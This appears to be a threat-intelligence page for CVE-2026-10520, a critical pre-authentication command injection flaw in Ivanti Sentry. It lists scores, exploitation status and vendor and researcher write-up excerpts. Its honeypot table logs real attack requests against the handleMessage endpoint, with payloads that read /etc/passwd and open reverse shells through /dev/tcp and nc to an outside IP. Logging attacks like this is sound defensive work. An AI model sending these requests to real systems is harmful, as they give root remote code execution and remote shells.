CVE-2026-10520

10.0

CVSS
Critical

PUBLISHED

An OS Command Injection vulnerability in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated user to...

Exploited in the wild PoC available Remote Low complexity No user interaction

Vendor: ivanti
Product: Sentry
Published: Jun 09, 2026
EPSS: 0.2% · 44% pctl

Automate this intelligence with the Pro API

Everything on this page — CVSS, EPSS, exploit status, PoCs, scanner integrations, mentions, tags, and immediate honeypot data — is available programmatically for VM, SOC, and CTI workflows.

Learn about Pro

Description

An OS Command Injection vulnerability in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated user to achieve root-level remote code execution

edge

Weaknesses (CWE)

CWE-78

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

CVSS scores

CVSS v3.1 10.0 Critical

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Exploitation status

Exploited in the wild

Recorded 2026-06-10 09:50:00 UTC · Defused Cyber

Proof of concept available

Recorded 2026-06-10 01:00:00 UTC

Honeypot observations

In-the-wild exploitation detected by KEVIntel private honeypots. Honeypot software may differ from the CVE vendor/product when attackers spray exploits across targets.

Unique attackers (24h): 3
Unique attackers (7d): 3
Honeypots hit (24h): 0
First seen (24h window): —
Last seen (24h window): —

Showing observations from the last 30 days.

Attack Time	Attacker IP	Honeypot Info	Request	Payload Used
2026-06-10 15:08 UTC	`185.209.199.106`	🇺🇸 Ivanti Sentry	`POST /mics/api/v2/sentry/mics-config/handleMessage` python-requests/2.32.5	`message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>cat /etc/passwd</reqandres></commandexec>`
2026-06-10 15:07 UTC	`185.209.199.106`	🇺🇸 Ivanti Sentry	`POST /mics/api/v2/sentry/mics-config/handleMessage` python-requests/2.32.5	`message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>sh -i >& /dev/tcp/222.170.120.232/2373 0>&1</reqandres></commandexec>`
2026-06-10 15:07 UTC	`185.209.199.106`	🇺🇸 Ivanti Sentry	`POST /mics/api/v2/sentry/mics-config/handleMessage` python-requests/2.32.5	`message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|sh -i 2>&1\|nc 222.170.120.232 2373 >/tmp/f</reqandres></commandexec>`
2026-06-10 15:02 UTC	`185.209.199.106`	🇺🇸 Ivanti Sentry	`POST /mics/api/v2/sentry/mics-config/handleMessage`	`message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>`

References

https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US

Known exploited vulnerability sources

Catalogues that list this CVE as a known exploited vulnerability.

Source	Added
Defused Cyber First	2026-06-10 09:50 UTC
KEVIntel	2026-06-10 15:02 UTC

Recent mentions

CVE-2026-10520, CVE-2026-10523 - Multiple critical vulnerabilities affecting Ivanti Sentry

Rapid7 · Jun 10, 2026

OverviewOn June 9, 2026, Ivanti published a security advisory for two critical vulnerabilities affecting Ivanti Sentry (formerly known as MobileIron Sentry), which per the vendor website is an “in-line gateway that manages, encrypts, and secures traffic between the mobile device and back-end enterprise systems”. The most severe issue, CVE-2026-10520, is an OS command injection vulnerability with a CVSS score of 10.0 that allows a remote unauthenticated attacker to achieve remote code execution (RCE) with root privileges. The second vulnerability, CVE-2026-10523, is an authentication bypass vulnerability with a CVSS score of 9.9 that allows a remote unauthenticated attacker to create arbitrary administrative accounts and obtain full administrative access. Ivanti has stated that they are not aware of any customers being exploited by either of these vulnerabilities at the time of disclosure. CVECVSSv3.1CWECVE-2026-1052010.0 (Critical)OS Command Injection (CWE-78)CVE-2026-105239.9 (Critical)Authentication Bypass Using an Alternate Path or Channel (CWE-288)On June 10, 2026, watchTowr published a technical analysis of CVE-2026-10520 that includes a proof-of-concept (PoC) exploit for unauthenticated RCE. Given the trivial nature of exploitation and the availability of a public PoC, exploitation in-the-wild is likely to begin. Ivanti Sentry has featured on the CISA KEV list twice in the past (for the vulnerabilities CVE-2023-38035 and CVE-2020-15505), so we know threat actors will likely target this product. Organizations running affected versions of Ivanti Sentry should remediate these issues on an urgent basis before exploitation in-the-wild begins.Technical overview for CVE-2026-10520Based upon the technical analysis by watchTowr, CVE-2026-10520 resides in the ConfigServiceController class within the Sentry web application, which is accessible via a POST request to the unauthenticated endpoint /mics/api/v2/sentry/mics-config/handleMessage.The handleMessage endpoint...

More Evidence That Words Don't Mean What We Thought They Meant (Ivanti Sentry Pre-Auth OS Command Injection CVE-2026-10520)

Watchtower Labs · Jun 10, 2026

Today, Ivanti published an advisory.“No way?” we hear you say. "Yes way!" a random dog screams back at you, across the street.Today’s rare advisory outlines two vulnerabilities in Ivanti’s Sentry product, appealing directly to our inner desire for sophisticated server-side,

Potential proof of concepts

These PoCs are unverified and could contain malware. Use at your own risk.

An Ivanti Sentry Authentication Bypass and Remote Code Execution Detection Artifact Generator

public · Created 2026-06-10 01:00:00 UTC

Vulnerability detail